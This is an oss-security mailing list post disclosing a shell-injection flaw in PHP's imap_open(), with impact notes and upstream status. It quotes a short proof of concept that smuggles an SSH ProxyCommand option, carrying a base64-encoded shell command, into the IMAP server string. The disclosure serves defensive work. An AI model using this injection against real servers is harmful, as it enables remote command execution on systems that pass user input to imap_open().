oss-sec mailing list archives
PHP imap_open() script injection
From: Hanno Böck <hanno () hboeck de>
Date: Thu, 22 Nov 2018 21:02:14 +0100
Hi, This was apparently posted on some russian forum recently and then re-posted to github: https://antichat.com/threads/463395/#post-4254681 https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php PoC code: $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}"; imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error()); It's pretty self explaining, it seems imap_open() will pass things to ssh and this is vulnerable to a shell injection. Impact would be mostly relevant if someone has some imap functionality where a user can define a custom imap server. (Though it might also be used as a bypass for environments where exec() and similar functions are restricted.) I reported it to upstream PHP a few days ago, it was closed as a duplicate, so it seems they already knew about it. It's unfixed in current versions. There seems to be some speculation that this might've been involved in a hack of a .onion hoster: https://danwin1210.me/ -- Hanno Böck https://hboeck.de/ mail/jabber: hanno () hboeck de GPG: FE73757FA60E4E21B937579FA5880072BBB51E42
Current thread:
- PHP imap_open() script injection Hanno Böck (Nov 22)
- Re: PHP imap_open() script injection Salvatore Bonaccorso (Nov 25)
- Re: PHP imap_open() script injection sjw (Dec 05)
- Re: PHP imap_open() script injection Salvatore Bonaccorso (Nov 25)